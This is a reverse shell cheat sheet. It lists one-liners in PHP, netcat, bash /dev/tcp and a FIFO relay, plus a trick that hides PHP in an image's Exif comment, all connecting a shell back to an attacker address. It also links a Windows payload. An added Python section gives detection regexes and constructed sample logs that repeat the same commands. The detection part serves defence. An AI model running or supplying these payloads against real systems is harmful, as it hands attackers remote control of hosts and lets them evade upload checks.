Reverse Shell Cheat Sheet
PHP
- Oneliner
php -r '$sock=fsockopen("172.16.1.1",4445);exec("/bin/sh -i <&3 >&3 2>&3");'
- Same one-liner, URL-encoded
php%20-r%20%27%24sock%3Dfsockopen%28%22172.16.1.1%22%2C4445%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
- PHP script calling bash
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
- Reverse shell payload for Windows
https://github.com/Dhayalanb/windows-php-reverse-shell
Netcat
nc 172.16.1.1 4545 -e /bin/sh
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 172.16.1.1 4444 1>/tmp/backpipe
Bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
PHP in the Exif comment of an image file
exiftool -Comment='<?php $sock = fsockopen("<IPADDRESS>",<PORT>);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>' <IMAGE>
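Detection
- Added example, not part of the original cheat sheet: a Python matcher that flags the command shapes listed above (bash /dev/tcp redirect, nc -e, the FIFO relay through nc, PHP fsockopen handed to exec/proc_open, PHP placed in an Exif comment) in logged command lines, checking the URL-decoded form as well. The rule names, the record layout and the sample records are constructed for illustration; addresses are documentation addresses.

```python
import re
from urllib.parse import unquote

# Rules derived from the one-liners on this page; the rule names are this example's own.
RULES = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/[^/\s]+/\S+"),
    "nc_exec": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s+\S*sh\b"),
    "fifo_nc_relay": re.compile(r"\bsh\b.*<\s*(\S+)\s*\|\s*(?:nc|ncat|netcat)\b.*>\s*\1"),
    "php_socket_shell": re.compile(r"fsockopen\s*\(.*(?:\bexec|proc_open)\s*\(", re.S),
    "php_in_exif": re.compile(r"exiftool\b.*-Comment=.*<\?php", re.S),
}

# Constructed sample records: "<timestamp> <host> <user> <command line or request>"
SAMPLE_LOG = """\
2024-05-01T10:00:01Z web01 www-data bash -i >& /dev/tcp/192.0.2.10/4444 0>&1
2024-05-01T10:00:02Z web01 www-data nc 192.0.2.10 4545 -e /bin/sh
2024-05-01T10:00:03Z web01 www-data /bin/sh 0</tmp/backpipe | nc 192.0.2.10 4444 1>/tmp/backpipe
2024-05-01T10:00:04Z web01 www-data GET /run?c=php%20-r%20%27%24sock%3Dfsockopen%28%22192.0.2.10%22%2C4445%29%3Bexec%28%22%2Fbin%2Fsh%22%29%3B%27
2024-05-01T10:00:05Z web01 alice nc -zv 192.0.2.20 22
2024-05-01T10:00:06Z web01 alice exiftool -Comment='holiday 2023' photo.jpg
"""

def classify(cmdline):
    """Return sorted names of all rules matching the text or its URL-decoded form."""
    decoded = unquote(cmdline)  # catches the percent-encoded variant
    return sorted(name for name, rx in RULES.items()
                  if rx.search(cmdline) or rx.search(decoded))

def scan(log_text):
    """Return (timestamp, user, matched rule names) for each flagged record."""
    hits = []
    for line in log_text.splitlines():
        ts, _host, user, cmd = line.split(" ", 3)
        rules = classify(cmd)
        if rules:
            hits.append((ts, user, rules))
    return hits

if __name__ == "__main__":
    for ts, user, rules in scan(SAMPLE_LOG):
        print(ts, user, ",".join(rules))
```

The port-scan and plain exiftool records are left unflagged; the percent-encoded request only matches after decoding.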